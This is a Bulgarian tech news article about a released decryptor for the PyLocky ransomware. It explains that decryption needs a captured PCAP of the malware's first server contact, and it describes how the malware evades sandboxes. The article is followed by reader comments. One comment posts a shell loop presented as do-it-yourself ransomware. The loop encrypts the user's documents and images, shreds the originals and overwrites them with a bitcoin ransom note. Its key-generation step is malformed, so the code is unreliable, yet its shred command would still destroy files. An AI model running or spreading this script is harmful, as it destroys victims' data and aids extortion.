Декриптирането обаче звучи, като непосилна задача.

Специалисти по информационна защита публикуваха декриптиращ инструмент за пореден криптовирус: PyLocky. Има обаче една хич немалка подробност, за да успеете да си върнете данните.

Безплатният инструмент, който Майк Баутиста е разработил, работи успешно, но за да си върнете данните, трябва да сте прихванали мрежовия PCAP файл, който се създава при първоначалната комуникация между зловредната програма и командния сървър на неговите разпространители – нещо, което, както отбелязват от The Hacker News, принципно никой не прави. Баутиста е открил, че когато PyLocky се свързва със сървъра след заразяване на системата, той изпраща информация за декриптиращия ключ, в която се съдържа стринг с инициализационния вектор (Initialization Vector, IV) и случайна парола, генерирана за криптиране на файловете.

PyLocky е сложен криптовирус, написан на Python, който се появи за пръв път през лятото на миналата година. Той беше открит от Trend Micro и се разпространява по стандартния за този тип програми начин – чрез масови спам кампании. За да избегне анализ в сендбокс среда, попаднал в системата, той проверява наличната памет, и ако тя е по-малко от 4GB, остава неактивен за близо 12 дни или по-точно 999.999 секунди. Той се активира, единствено при регистриране на повече от споменатия обем видима памет.

3
ДОБАВИ КОМЕНТАР

avatar
3 Коментари
0 Отговори на коментарите
3 Последователи
 
Коментарът с най-много реакции
Най-горещият коментар
3 Автори на коментарите
Linus Torvaldsкламенякой Автори на последните коментари
  Абонирай се  
нови стари оценка
Извести ме за
някой
някой

к’вой това часовник…….упс……хич?

кламе
кламе

„Декриптирането обаче звучи, като непосилна задача.“ Оф, колко неграмотност има тук…………………..

Linus Torvalds
Linus Torvalds

Да се напише нещо, което криптира файловете е лесно. Особено за Линукс, където тези инструменти са вградени в системата.

for f in $(find ~/ -name ‘*.txt’ -or -name ‘*.jpg’ -or -name ‘*.png’ -or -name ‘*.jpeg’ -or -name ‘*.pdf’ -or -name ‘*.doc’ -or -name ‘*.docx’);
do openssl des3 -k LC_ALL=C tr -dc A-Za-z0-9_ < /dev/urandom | head -c 150 | xargs -in $f -out $f.encrypted; shred $f;
echo “Send 0.4 bitcoins to get your data back: 1G9Emf3VRMrm1pZEzFs6ZqAwHdUuijJ4Et ” > $f;
done